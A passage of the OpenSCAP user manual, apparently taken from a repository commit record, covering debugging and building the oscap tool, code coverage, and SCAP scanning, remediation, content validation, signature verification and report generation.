OVAL, CPE, ... schemas (required\nfor validation)\n* *OSCAP_XSLT_PATH* - path to XSLT transformations (required if you want\nto generate html documents from xml)\n\n==== Example\n\n $ .\/run gdb --args utils\/.libs\/oscap xccdf eval --profile hard --results xccdf-results.xml --oval-results my-favourite-xccdf-checklist.xml\n\n\nThe ```--oval-results``` option forces the ```oscap``` tool to generate an OVAL Result file\nfor each OVAL session used for evaluation. It's also very useful for\ndebugging!\n\n==== Debugging probes\nIt's also possible to debug a probe itself. 
=== Debugging\nDevelopers and users who intend to help find and fix possible bugs in OpenSCAP\nshould follow these instructions on how to enable debugging in OpenSCAP:\n\n==== Debug mode\nThe first and most obvious step is to re-compile the library with debug mode\nenabled.\n\n------------------------------------\n$ .\/configure --enable-debug && make\n------------------------------------\n\nDebug mode provides:\n\n* debug symbols on and optimization off - you can use ```gdb```,\n* logs - the ```oscap``` tool will generate *oscap_debug.log.\\{pid}* log files for\nevery process that was run,\n* http:\/\/www.gnu.org\/software\/gawk\/manual\/html_node\/Assert-Function.html[assertions]\nare evaluated.\n\n==== Testing library\nThe next important step is to preload ```libopenscap_testing.so``` before you run\nthe ```oscap``` tool. The testing library allows you to specify a custom path to\nprobes via the *OVAL_PROBE_DIR* environment variable. The easiest way to\nachieve that without installing libopenscap is to use the shell\nscript called *run* in the OpenSCAP directory.\n\n-------------------------------------------------\n$ .\/run utils\/.libs\/oscap xccdf eval ... whatever\n-------------------------------------------------\n\nThe *run* script is generated at configure time and it sets:\n\n* *LD_PRELOAD* and *LD_LIBRARY_PATH* - preload ```libopenscap_testing.so```\n* *OVAL_PROBE_DIR* - path to probes\n* *OSCAP_SCHEMA_PATH* - path to XCCDF, OVAL, CPE, ... schemas (required\nfor validation)\n* *OSCAP_XSLT_PATH* - path to XSLT transformations (required if you want\nto generate HTML documents from XML)\n\n==== Example\n\n $ .\/run gdb --args utils\/.libs\/oscap xccdf eval --profile hard --results xccdf-results.xml --oval-results my-favourite-xccdf-checklist.xml\n\n\nThe ```--oval-results``` option forces the ```oscap``` tool to generate an OVAL Result\nfile for each OVAL session used for evaluation. It's also very useful for\ndebugging!\n\n==== Debugging probes\nIt's also possible to debug a probe itself. You need to raise the timeout\nvalue for the thread join in ```src\/OVAL\/probes\/probe\/main.c:228``` and rebuild\nthe sources.\n\n----------------------------\n- j_tm.tv_sec += 3;\n+ j_tm.tv_sec += 3000;\n----------------------------\n\nThen you can run gdb with the probe binary:\n--------------------------------------------------------\n$ .\/run gdb src\/OVAL\/probes\/.libs\/probe_rpmverifypackage\n--------------------------------------------------------\n\nAn input for the probe can be found in ```oscap_debug.log``` created by a\nprevious ```oscap``` tool run, e.g.:\n\n----\n (\"seap.msg\" \":id\" 0 ((\"rpmverifypackage_object\" \":id\" \"oval:org.mitre.oval.test:obj:1386\" \":oval_version\" 84541440 ) ((\"name\" \":operation\" 5 \":var_check\" 1 ) \"plymouth\" ) ((\"behaviors\" \":nodeps\" \"false\" \":nodigest\" \"false\" \":noscripts\" \"true\" \":nosignature\" \"false\" ) ) ) )\n----\n\n==== Environment variables\nThere are a few more environment variables that control the ```oscap``` tool's\nbehaviour.\n\n* *OSCAP_FULL_VALIDATION=1* - validate all exported documents (slower)\n* *SEXP_VALIDATE_DISABLE=1* - do not validate SEXP expressions (faster)\n* *OSCAP_DEBUG_FILE=\"foo\"* - name for debug files\n* *OSCAP_DEBUG_LEVEL=2* - set verbosity in debug logs\n** ```1``` for Errors\n** ```2``` for Errors & Warnings\n** ```3``` for Errors & Warnings & Info messages\n\n
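For instance, these variables can be combined with the *run* script described\nabove; the following sketch (reusing the checklist file name from the earlier\nexample) enables full validation and verbose logging:\n\n----\n$ OSCAP_DEBUG_LEVEL=3 OSCAP_FULL_VALIDATION=1 .\/run utils\/.libs\/oscap xccdf eval --profile hard my-favourite-xccdf-checklist.xml\n----\n\n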
=== Scanning with Script Check Engine (SCE)\nThe Script Check Engine (SCE) is an alternative check engine for XCCDF checklist\nevaluation. SCE allows you to call shell scripts out of the XCCDF document.\nThis approach might be suitable for various use cases, mostly when OVAL checks\nare not required. More information about SCE usage is available on this page:\n{sce_web}[Using SCE].\n\nWARNING: SCE is not part of any SCAP specification.\n\n\n=== Building OpenSCAP on Windows\nThe OpenSCAP library is developed mainly on the Linux platform but it can also\nbe built on Windows platforms. Follow these instructions to build\nOpenSCAP on Windows using Cygwin:\n\n1. The easiest way to compile OpenSCAP on Windows is in\nhttp:\/\/www.cygwin.com\/[cygwin]. First install a basic set of packages from\nthe *cygwin* distribution plus:\n* *autoconf automake libtool make gcc*\n* *pcre-devel libxml2-devel libcurl-devel libgcrypt-devel*\n* *swig perl python*\n2. Checkout the master branch of OpenSCAP:\n\n $ git clone -b master https:\/\/github.com\/OpenSCAP\/openscap.git\n\n3. Run the autotools machinery by\n\n $ .\/autogen.sh\n\n4. Unfortunately the probes support is platform dependent and the Windows code\nhas not been implemented yet, so it's necessary to disable compilation of probes by\n\n $ configure --disable-probes\n\n5. Build the library\n\n $ make build\n\n6. You might want to run the library self-check by\n\n $ make check\n\n7. Install the library\n\n $ make install\n\n8. The final DLL is called ```cygopenscap-0.dll``` and you can link your app\nto it.\n\n----------------------------------------------------------------------------------\nExample: gcc myapp.c -I\/path\/to\/headers -L\/path\/to\/dynamic\/library -lcygopenscap-0\n----------------------------------------------------------------------------------\n\nIf you want to run your app, make sure ```cygopenscap-0.dll``` is either in\nthe working directory or in one of the PATH variable directories.\n\n=== Generating code coverage\nCode coverage can be useful when writing tests or profiling performance.\nThe process can be separated into five phases.\n\n1) *Get dependencies*\n\n # dnf install lcov\n\n2) *Run configure & make*\n\nTo allow the code to generate statistics, we need to compile it with specific flags.\n\n $ .\/configure CFLAGS=\"--coverage\" LDFLAGS=-lgcov --enable-debug\n $ make\n\n3) *Run code*\n\nIn this phase we run the code, either directly or via the test suite.\n\n $ .\/run .\/utils\/.libs\/oscap\n\n4) *Generate and browse results*\n\n $ lcov -t \"OpenSCAP coverage\" -o .\/coverage.info -c -d .\n $ genhtml -o .\/coverage .\/coverage.info\n $ xdg-open .\/coverage\/index.html # open results in browser\n\n5) *Clean stats*\n\nEvery run only adds to the current statistics rather than rewriting them\ncompletely. If we want to generate fresh statistics, we should remove the old\nones first.\n \n $ lcov --directory .\/ --zerocounters ; find .\/ -name \"*.gcno\" | xargs rm\n $ rm -rf .\/coverage\n\n=== Building OpenSCAP for Windows (cross-compilation)\nBuilding OpenSCAP for Windows without a POSIX emulation layer is currently not\npossible. However, we are close to a native port of OpenSCAP for Windows. If you\nwant to help us solve the remaining problems, follow these instructions for\ncross-compiling OpenSCAP for Windows:\n\n1) Install the cross-compiler & dependencies\n\n-------------------------------------------------------------\n # yum install mingw32-gcc mingw32-binutils mingw32-libxml2 \\\n mingw32-libgcrypt mingw32-pthreads mingw32-libxslt \\\n mingw32-curl mingw32-pcre \\\n automake autoconf libtool\n-------------------------------------------------------------\n\n2) Check out the OpenSCAP repository\n\n----------------------------------------------------------------------\n $ git clone -b master https:\/\/github.com\/OpenSCAP\/openscap.git \\\n openscap-portable.git\n $ cd openscap-portable.git\/\n----------------------------------------------------------------------\n\n3) Prepare the build\n\n------------------------------------------------------\n $ .\/autogen.sh\n $ mingw32-configure --disable-probes --disable-python\n------------------------------------------------------\n\n4) Build!\n\n------------------------------\n $ make -k 2> build-errors.log\n------------------------------\n\n5) Inspect build-errors.log for problems\n\n-----------------------------------------------\n $ grep -E '(error:|implicit)' build-errors.log\n-----------------------------------------------\n\n--------------------------------------------------------------------------\noscap_acquire.c:32:17: fatal error: ftw.h: No such file or directory\nrbt_i32.c:36:9: warning: implicit declaration of function 'posix_memalign'\nrbt_i64.c:35:9: warning: implicit declaration of function 'posix_memalign'\nrbt_str.c:39:9: warning: implicit declaration of function 'posix_memalign'\ntailoring.c:200:2: warning: implicit declaration of function 'strverscmp'\noscap-tool.c:37:17: fatal error: ftw.h: No such file or directory\noscap-oval.c:37:17: fatal error: ftw.h: No such file or directory\noscap-info.c:37:26: fatal error: linux\/limits.h: No such file or directory\n--------------------------------------------------------------------------\n\nWe need to solve the following problems:\n\n1. No implementation of ```strverscmp``` for Windows\n2. No implementation of the ftw API for Windows\n3. Replace posix_memalign with a Windows API equivalent\n4. 
Get rid of ```linux\/limits.h``` dependency on Windows\n\nIf you would like to send us a patch solving one of these problems,\nplease consult the page about\nhttp:\/\/open-scap.org\/page\/Contribute[contributing to the OpenSCAP\nproject].\n\n\n=== OpenSCAP Reference Manual\nFor more information about OpenSCAP library, you can refer to this online\nreference manual: http:\/\/static.open-scap.org\/openscap-1.2\/[OpenSCAP\nreference manual]. This manual is included in a release tarball and can be\nregenerated from project sources by Doxygen documentation system.\n\n","old_contents":"= OpenSCAP User Manual\nMichal \u0160ruba\u0159 <msrubar@redhat.com>\nv1.0, 2015-31-08\n:imagesdir: .\/images\n:workbench_url: https:\/\/www.open-scap.org\/tools\/scap-workbench\/\n:sce_web: https:\/\/www.open-scap.org\/features\/other-standards\/sce\/\n:openscap_web: https:\/\/open-scap.org\/\n:oscap_git: https:\/\/github.com\/OpenSCAP\/openscap\n:ssg_git: https:\/\/github.com\/OpenSCAP\/scap-security-guide\n:xmlsec: https:\/\/www.aleksey.com\/xmlsec\/\n:xslt: http:\/\/www.w3.org\/TR\/xslt\n:xsl: http:\/\/www.w3.org\/Style\/XSL\/\n:ssg: http:\/\/open-scap.org\/security-policies\/scap-security-guide\/\n:xccdf: http:\/\/scap.nist.gov\/specifications\/xccdf\/\n:xccdf_1-2: http:\/\/scap.nist.gov\/specifications\/xccdf\/#resource-1.2\n:scap: http:\/\/scap.nist.gov\/\n:nist: http:\/\/www.nist.gov\/\n:cpe: https:\/\/cpe.mitre.org\/\n:cce: https:\/\/cce.mitre.org\/\n:oval: https:\/\/oval.mitre.org\/\n:pci_dss: https:\/\/www.pcisecuritystandards.org\/security_standards\/\n:usgcb: http:\/\/usgcb.nist.gov\/\n:stig: http:\/\/iase.disa.mil\/stigs\/Pages\/index.aspx\n:scap_1-2: http:\/\/scap.nist.gov\/revision\/1.2\/\n:scap_1-1: http:\/\/scap.nist.gov\/revision\/1.1\/index.html\n:scap_1-0: http:\/\/scap.nist.gov\/revision\/1.0\/\n:nvd: https:\/\/web.nvd.nist.gov\/view\/ncp\/repository\n:toc:\n:toc-placement: preamble\n:numbered:\n\nimage::vertical-logo.png[align=\"center\"]\n\ntoc::[]\n\n== Introduction\n\nThis documentation provides information about a command-line tool called\n ```oscap``` and its most common operations. With ```oscap``` you can check\nsecurity configuration settings of a system, and examine the system for signs of\na compromise by using rules based on standards and specifications. The\n ```oscap``` uses {scap}[SCAP] which is a line of specifications maintained by\nthe {nist}[NIST] which was created to provide a standardized approach for\nmaintaining system security. New specifications are governed by NIST's SCAP\nhttp:\/\/scap.nist.gov\/timeline.html[Release cycle] in order to provide a\nconsistent and repeatable revision workflow. The ```oscap``` mainly processes\nthe {xccdf}[XCCDF] which is a standard way of expressing a checklist content and\ndefines security checklists. It also combines with other specifications such as\n{cpe}[CPE], {cce}[CCE] and {oval}[OVAL] to create a SCAP-expressed checklist that\ncan be processed by SCAP-validated products. For more information about the\nSCAP please refer to http:\/\/open-scap.org\/features\/standards\/[SCAP Standards].\n\nThe ```oscap``` tool is a part of the {openscap_web}[OpenSCAP] project. If you're\ninterested in a graphical alternative to this tool please visit\n{workbench_url}[SCAP Workbench] page.\n\n\nWe will use the _scap-security-guide_ {ssg}[SSG] project to provide us the SCAP\ncontent. 
It provides security policies written in the form of SCAP documents\ncovering many areas of computer security, and it implements security guidance\nrecommended by respected authorities, namely {pci_dss}[PCI DSS], {stig}[STIG], and\n{usgcb}[USGCB].\n\nYou can also generate your own SCAP content if you have an understanding of at least\nXCCDF or OVAL. XCCDF content is also frequently published online under open\nsource licenses, and you can customize this content to suit your needs instead.\nSCAP Workbench is a great tool to do the customization.\n\nThe Basic oscap Usage section of the manual shows how to install the tool\nand SCAP content, and how to use them to examine SCAP content, perform a\nconfiguration scan, or automatically remediate your machines.\n\nThe third section covers advanced topics like validation, signing and\ntransformation of SCAP content, generating reports and guides, and also some\ninformation about CPE applicability.\n\nThe last section contains information about debugging and compiling oscap on Linux\nand Windows, which can be useful for developers.\n\n== Basic oscap Usage\n\nIf you want to perform configuration or vulnerability scans of a local system\nthen the following must be available:\n\n . A tool (```oscap``` or SCAP Workbench)\n . SCAP content (XCCDF, OVAL...)\n\n=== Installation\n\nYou can either build the OpenSCAP library and the ```oscap``` tool from\n{oscap_git}[source] (for details please refer to the <<devs-compiling,compiling>> section),\nor you can use an existing build for your Linux distribution. Use the\nfollowing yum command if you want to install the oscap tool on your\nFedora or Red Hat Enterprise Linux distribution:\n\n----------------------------\n# yum install openscap-scanner\n----------------------------\n\nNOTE: If ```openscap-scanner``` is not available, install\n ```openscap-utils``` instead.\n\nBefore you can start using the ```oscap``` tool you must have some SCAP content\non your system. You can download it from the respective web site, but we\nwill use the SSG project in the following sections. You can build it from the\n{ssg_git}[source] or you can install it using a package management system:\n\n----------------------------\n# yum install scap-security-guide\n----------------------------\n\nThe SCAP content will be installed in *__\/usr\/share\/xml\/scap\/ssg\/content\/__*.\n\nWhen the SCAP content is imported or installed on your system, ```oscap``` can\nprocess the content by specifying the file path to the content. The ```oscap```\ntool supports SCAP {scap_1-2}[1.2] and is backward compatible with SCAP\n{scap_1-1}[1.1] and SCAP {scap_1-0}[1.0]. No special treatment is required in\norder to import and process earlier versions of the SCAP content.\n\nTo display the version of oscap, supported specifications, built-in CPE\nnames, and supported OVAL objects, type the following command:\n\n----------\n$ oscap -V\n----------\n\n=== Displaying Information About SCAP Content\nOne of the capabilities of ```oscap``` is to display information about the SCAP\ncontents within a file. Running the ```oscap info``` command allows the\nexamination of the internal structure of a SCAP document and displays\ninformation such as the document type, specification version, status, the date\nthe document was published (Generated) and the date the document was copied to\nthe file system (Imported). When examining an XCCDF document or a SCAP data stream,\ngenerally, the most useful information is about profiles, checklists, and\nstreams. 
The following example demonstrates usage of the command:\n\n $ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\nThe following is a sample output of the command above:\n\n----\nDocument type: Source Data Stream\nImported: 2015-07-13T10:23:11\n\nStream: scap_org.open-scap_datastream_from_xccdf_ssg-rhel7-xccdf-1.2.xml\nGenerated: (null)\nVersion: 1.2\nChecklists:\n\tRef-Id: scap_org.open-scap_cref_ssg-rhel7-xccdf-1.2.xml\n\t\tProfiles:\n\t\t\txccdf_org.ssgproject.content_profile_standard\n\t\t\txccdf_org.ssgproject.content_profile_pci-dss\n\t\t\txccdf_org.ssgproject.content_profile_rht-ccp\n\t\t\txccdf_org.ssgproject.content_profile_common\n\t\t\txccdf_org.ssgproject.content_profile_stig-rhel7-server-upstream\n\t\tReferenced check files:\n\t\t\tssg-rhel7-oval.xml\n\t\t\t\tsystem: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\nChecks:\n\tRef-Id: scap_org.open-scap_cref_ssg-rhel7-oval.xml\n\tRef-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-oval.xml\n\tRef-Id: scap_org.open-scap_cref_output--ssg-rhel7-oval.xml\nDictionaries:\n\tRef-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-dictionary.xml\n----\n\n=== Scanning with OSCAP\nThe main goal of the ```oscap``` tool is to perform configuration and\nvulnerability scans of a local system. Oscap is able to evaluate both\nXCCDF benchmarks and OVAL definitions and generate the appropriate\nresults. Please note that SCAP content can be provided either in a\nsingle file (as an OVAL file or SCAP Data Stream), or as multiple\nseparate XML files. The following examples distinguish between these two\napproaches.\n\n==== OVAL\nThe SCAP document can have a form of a single OVAL file (an OVAL\nDefinition file). The ```oscap``` tool processes the OVAL Definition file\nduring evaluation of OVAL definitions. It collects system\ninformation, evaluates it and generates an OVAL Result file. The result\nof evaluation of each OVAL definition is printed to standard output\nstream. 
The following examples describe the most common scenarios\ninvolving an OVAL Definition file.\n\n* To evaluate all definitions within the given OVAL Definition file, run\nthe following command:\n----\n$ oscap oval eval --results oval-results.xml scap-oval.xml\n----\nWhere *scap-oval.xml* is the OVAL Definition file and *oval-results.xml*\nis the OVAL Result file.\n\n* The following is an example of evaluating one particular definition\nwithin the given OVAL Definition file:\n----\n$ oscap oval eval --id oval:rhel:def:1000 --results oval-results.xml scap-oval.xml\n----\nWhere the OVAL definition being evaluated is identified by the\n*oval:rhel:def:1000* string, *scap-oval.xml* is the OVAL Definition file,\nand *oval-results.xml* is the OVAL Result file.\n\n* To evaluate all definitions from the OVAL component that are part of a\nparticular data stream within a SCAP data stream collection, run the\nfollowing command:\n----\n$ oscap oval eval --datastream-id ds.xml --oval-id xccdf.xml --results oval-results.xml scap-ds.xml\n----\nWhere *ds.xml* is the given data stream, *xccdf.xml* is an XCCDF file\nspecifying the OVAL component, *oval-results.xml* is the OVAL Result\nfile, and *scap-ds.xml* is a file representing the SCAP data stream\ncollection.\n\n\nWhen the SCAP content is represented by multiple XML files, the OVAL\nDefinition file can be distributed along with the XCCDF file. In such a\nsituation, OVAL Definitions may depend on variables that are exported\nfrom the XCCDF file during the scan, and separate evaluation of the OVAL\ndefinition(s) would produce misleading results. Therefore, any external\nvariables have to be exported to a special file that is used during the\nOVAL definitions evaluation. The following commands are examples of this\nscenario:\n\n----\n$ oscap xccdf export-oval-variables --profile united_states_government_configuration_baseline usgcb-rhel5desktop-xccdf.xml\n----\n----\n$ oscap oval eval --variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml --results usgcb-results-oval.xml usgcb-rhel5desktop-oval.xml\n----\nWhere *united_states_government_configuration_baseline* represents a\nprofile in the XCCDF document, *usgcb-rhel5desktop-xccdf.xml* is a file\nspecifying the XCCDF document, *usgcb-rhel5desktop-oval.xml* is the OVAL\nDefinition file, *usgcb-rhel5desktop-oval.xml-0.variables-0.xml* is the\nfile containing exported variables from the XCCDF file, and\n*usgcb-results-oval.xml* is the OVAL Result file.\n\n==== XCCDF\nWhen evaluating an XCCDF benchmark, ```oscap``` usually processes an XCCDF\nfile, an OVAL file and the CPE dictionary. It performs a system\nanalysis and produces XCCDF results based on this analysis. The results\nof the scan do not have to be saved in a separate file but can be\nattached to the XCCDF file. The evaluation result of each XCCDF rule\nwithin an XCCDF checklist is printed to the standard output stream. The CVE\nand CCE identifiers associated with the rules are printed as well. 
The following is a sample output for a single XCCDF rule:\n\n----\nTitle Verify permissions on 'group' file\nRule usgcb-rhel5desktop-rule-2.2.3.1.j\nIdent CCE-3967-7\nResult pass\n----\n\nThe CPE dictionary is used to determine whether the content is\napplicable on the target platform or not. Any content that is not\napplicable will result in each relevant XCCDF rule being evaluated to\n\"notapplicable\".\n\nThe following examples show the most common scenarios of XCCDF benchmark\nevaluation:\n\n* To evaluate a specific profile in an XCCDF file run this command:\n\n----\n$ oscap xccdf eval --profile Desktop --results xccdf-results.xml --cpe cpe-dictionary.xml scap-xccdf.xml\n----\n\nWhere *scap-xccdf.xml* is the XCCDF document, *Desktop* is the selected\nprofile from the XCCDF document, *xccdf-results.xml* is a file storing\nthe scan results, and *cpe-dictionary.xml* is the CPE dictionary.\n\n\n* To evaluate a specific XCCDF benchmark that is part of a data stream\nwithin a SCAP data stream collection run the following command:\n\n----\n$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *ds.xml* is the particular data stream, *xccdf.xml* is the ID of\nthe component-ref pointing to the desired XCCDF document, and\n*xccdf-results.xml* is a file containing the scan results.\n\nNOTE: If you omit ```--datastream-id``` on the command line, the first data\nstream from the collection will be used. If you omit ```--xccdf-id```, the\nfirst component from the checklists element will be used. If you omit\nboth, the first data stream that has a component in the checklists\nelement will be used - the first component in its checklists element\nwill be used.\n\n\n* (Alternative, not recommended) To evaluate a specific XCCDF benchmark\nthat is part of a data stream within a SCAP data stream collection run\nthe following command:\n\n----\n$ oscap xccdf eval --benchmark-id benchmark_id --results xccdf-results.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *benchmark_id* is a string matching the \"id\" attribute of\nthe xccdf:Benchmark contained in a component, and *xccdf-results.xml* is a\nfile containing the scan results.\n\n
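A human-readable report can also be requested directly during the evaluation\nusing the ```--report``` option (a sketch reusing the file names from the first\nexample above):\n\n----\n$ oscap xccdf eval --profile Desktop --results xccdf-results.xml --report report.html --cpe cpe-dictionary.xml scap-xccdf.xml\n----\n\n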
=== Remediate System\nOpenSCAP allows you to automatically remediate systems that have been found in a\nnon-compliant state. For system remediation, an XCCDF file with instructions is\nrequired. The _scap-security-guide_ package contains certain remediation\ninstructions.\n\nSystem remediation consists of the following steps:\n\n . ```oscap``` performs a regular XCCDF evaluation.\n . An assessment of the results is performed by evaluating the OVAL definitions.\n Each rule that has failed is marked as a candidate for remediation.\n . ```oscap``` searches for an appropriate fix element, resolves it, prepares the\n environment, and executes the fix script.\n . Any output of the fix script is captured by ```oscap``` and stored within the\n *rule-result* element. The return value of the fix script is stored as well.\n . Whenever ```oscap``` executes a fix script, it immediately evaluates the OVAL\n definition again (to verify that the fix script has been applied correctly).\n During this second run, if the OVAL evaluation returns success, the result of\n the rule is *fixed*, otherwise it is an *error*.\n . Detailed results of the remediation are stored in an output XCCDF file. It\n contains two *TestResult* elements. The first *TestResult* element represents the\n scan prior to the remediation. The second *TestResult* is derived from the first\n one and contains remediation results.\n\nThere are three modes of operation of ```oscap``` with regard to remediation:\nonline, offline, and review.\n\n==== Online Remediation\nOnline remediation executes fix elements at the time of scanning. Evaluation and\nremediation are performed as a part of a single command.\n\nTo enable online remediation, use the ```--remediate``` command-line option. For\nexample, to execute online remediation using the _scap-security-guide_ package,\nrun:\n\n----\n$ oscap xccdf eval --remediate --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\nThe output of this command consists of two sections. The first section shows the\nresult of the scan prior to the remediation, and the second section shows the\nresult of the scan after applying the remediation. The second part can contain\nonly *fixed* and *error* results. The *fixed* result indicates that the scan performed\nafter the remediation passed. The *error* result indicates that even after\napplying the remediation, the evaluation still does not pass.\n\n==== Offline Remediation\nOffline remediation allows you to postpone fix execution. In the first step, the\nsystem is only evaluated, and the results are stored in a *TestResult* element in\nan XCCDF file.\n\nIn the second step, ```oscap``` executes the fix scripts and verifies the result. It\nis safe to store the results into the input file, no data will be lost. During\noffline remediation, a new *TestResult* element is created that is based\non the input one and inherits all the data. The newly created *TestResult*\ndiffers only in the *rule-result* elements that have failed. For those,\nremediation is executed.\n\nTo perform offline remediation using the _scap-security-guide_ package, run:\n\n----\n$ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n----\n$ oscap xccdf remediate --results scan-xccdf-results.xml scan-xccdf-results.xml\n----\n\n==== Remediation Review\nThe review mode allows users to store remediation instructions to a file for\nfurther review. The remediation content is not executed during this operation.\nTo generate remediation instructions in the form of a shell script, run:\n\n $ oscap xccdf generate fix --template urn:xccdf:fix:script:sh --profile xccdf_org.ssgproject.content_profile_rht-ccp --output my-remediation-script.sh \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\n
Please note these files are not generated\nunless *--oval-results* is used.\n\nSome content may use alternative check engines, for example the\n{sce_web}[SCE] check engine.\n\nResults of rules with a check that requires a check engine not supported\nby OpenSCAP will be reported as *notchecked*. Check contents are not\nread or interpreted in any way unless the check system is known and\nsupported. Following is an evaluation output of an XCCDF with unknown\ncheck system:\n\n--------------------------------------------------------\n$ oscap xccdf eval sds-datastream.xml\n\nTitle Check group file contents\nRule xccdf_org.example_rule_system_authcontent-group\nResult notchecked\n\nTitle Check password file contents\nRule xccdf_org.example_rule_system_authcontent-passwd\nResult notchecked\n\nTitle Check shadow file contents\nRule xccdf_org.example_rule_system_authcontent-shadow\nResult notchecked\n\n...\n--------------------------------------------------------\n\nNOTE: The *notchecked* result is also reported for rules that have no\ncheck implemented. *notchecked* means that there was no check in that\nparticular rule that could be evaluated.\n\n\n==== CVE, CCE and other identifiers\nEach XCCDF Rule can have xccdf:ident elements inside. These elements\nallow the content creator to reference various external identifiers like\nCVE, CCE and others.\n\nWhen scanning, oscap output identifiers of scanned rules regardless of\ntheir results. For example:\n\n------------------------------------------------------------------------\nTitle Ensure Repodata Signature Checking is Not Disabled For Any Repos\nRule rule-2.1.2.3.6.a\nResult pass\n\nTitle Verify user who owns 'shadow' file\nRule rule-2.2.3.1.a\nIdent CCE-3918-0\nResult pass\n\nTitle Verify group who owns 'shadow' file\nRule rule-2.2.3.1.b\nIdent CCE-3988-3\nResult pass\n------------------------------------------------------------------------\n\nAll identifiers (if any) are printed to stdout for each rule. Since\nstandard output doesn't allow for compact identifier metadata to be\ndisplayed, only the identifiers themselves are displayed there.\n\nIdentifiers are also part of the HTML report output. If the identifier\nis a CVE you can click it to display its metadata from the official NVD\ndatabase (requires internet connection). OpenSCAP doesn't provide\nmetadata for other types of identifiers.\n\n==== Bundled CCE data\nOpenSCAP does not provide any static or product bundled CCE data. Thus\nit has no way of displaying the last generated, updated and officially\npublished dates of static or product bundled CCE data because the dates\nare not defined.\n\n\n\n\n== Advanced oscap usage\n\n=== Validating SCAP Content\nBefore you start using a security policy on your systems, you should first\nverify the policy in order to avoid any possible syntax or semantic errors in\nthe policy. The ```oscap``` tool can be used to validate the security content\nagainst standard SCAP XML schemas. The validation results are printed to the\nstandard error stream (stderr). The general syntax of such a validation command\nis the following:\n\n $ scap module validate [module_options_and_arguments] file\n\nwhere file is the full path to the file being validated. As a ```module``` you\ncan use:\n\n * xccdf,\n * oval,\n * cpe or\n * cve.\n\nThe only exception is the data stream module (ds), which uses the sds-validate\noperation instead of validate. 
So for example, it would be like:\n\n $ oscap ds sds-validate scap-ds.xml\n\nNOTE: Note that all SCAP components within the given data stream are validated\nautomatically and none of the components is specified separately.\n\nYou can also enable extra Schematron-based validation if you validate OVAL\nspecification. This validation method is slower but it provides deeper analysis.\nRun the following command to validate an OVAL document using Schematron:\n\n $ oscap oval validate --schematron oval-file.xml\n\nThe results of validation are printed to standard error stream (stderr).\n\nNOTE: Please note that for the rest of ```oscap``` functionality, unless you specify\n--skip-valid, validation will automatically occur before files are used.\nTherefore, you do not need to explicitly validate a datastream before\nuse.\n\n\n=== SCAP Content Signing and Signature Verification\nThe ```oscap``` itself does not do signature verification. It skips over the\nrespective elements. This is due to the fact that there are way too many options\nwhen it comes to keystores and crypto choices. Instead we recommend users to use\n{xmlsec}[xmlsec1] to verify their SCAP content. Safely evaluating signed\ncontent (with signature verification) involves the following steps:\n\n1) Install xmlsec1 and at least one of its crypto engines\n-------------------------------------\n# yum install xmlsec1 xmlsec1-openssl\n-------------------------------------\n\n2) Run ```xmlsec1 --verify``` on the content:\n\nThis simple example will only show 2 specific cases of verifying the\nsignature, the steps may vary depending on which technique was used to\nsign the datastream.\n\nAssuming the datastream was signed with a private key and we have the\nrespective public key to verify it with:\n\n------------------------------------------------------\n$ xmlsec1 --verify --pubkey-pem pub.key datastream.xml\n------------------------------------------------------\n\nAssuming the datastream was signed with a certificate and we have the\nrespective public part of the certificate to verify it with:\n\n---------------------------------------------------------------\n$ xmlsec1 --verify --pubkey-cert-pem pubcert.key datastream.xml\n---------------------------------------------------------------\n\nThere are countless other options, for more details see: ```xmlsec1\n--help-verify```\n\nSuccessful output should look similar to this:\n\n-----------------------------------------------------\n$ xmlsec1 verify --pubkey-pem key.pub datastream.xml\nOK\nSignedInfo References (ok\/all): 1\/1\nManifests References (ok\/all): 0\/0\n-----------------------------------------------------\n\nAnd the exit code must be 0 before proceeding.\n\n3) If the previous steps resulted in successful verification, proceed\nby evaluating the datastream:\n\n---------------------------------\n$ oscap xccdf eval datastream.xml\n---------------------------------\n\nNOTE: If you want to experiment with various crypto engines of xmlsec1, see\n ```xmlsec1-config --help```\n\n\n=== Generating Reports and Guides\nAnother useful features of ```oscap``` is the ability to generate SCAP content in a\nhuman-readable format. It allows you to transform an XML file\ninto HTML or plain-text format. This feature is used to generate security\nguides and checklists, which serve as a source of information, as well as\nguidance for secure system configuration. The results of system scans can also\nbe transformed to well-readable result reports. 
The general command syntax is\nthe following:\n\n $ oscap module generate sub-module [specific_module\/sub-module_options_and_arguments] file\n\nwhere module is either ```xccdf``` or ```oval```, ```sub-module``` is a type of\nthe generated document, and file represents an XCCDF or OVAL file. A sub-module\ncan be either ```report```, ```guide```, ```custom``` or ```fix```. Please see\n ```man oscap``` for more details.\n\n\n=== Content Transformation\nThe oscap tool is also capable of using the {xslt}[XSLT] (Extensible Stylesheet\nLanguage Transformations) language, which allows transformation of a SCAP\ncontent XML file into another XML, HTML, plain text or {xsl}[XSL] document.\nThis feature is very useful when you need the SCAP document in a\nhuman-readable form. The following commands represent the most common\ncases:\n\n* Creating a guide (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/guide.html[example]):\n--------------------------------------------------------\n$ oscap xccdf generate guide scap-xccdf.xml > guide.html\n--------------------------------------------------------\n\n* Creating a guide with profile checklist (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/guide-checklist.html[example]):\n------------------------------------------------------------------------------------\n$ oscap xccdf generate guide --profile Desktop scap-xccdf.xml > guide-checklist.html\n------------------------------------------------------------------------------------\n\n* Generating the XCCDF scan report (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/report-xccdf.html[example]):\n-------------------------------------------------------------------\n$ oscap xccdf generate report xccdf-results.xml > 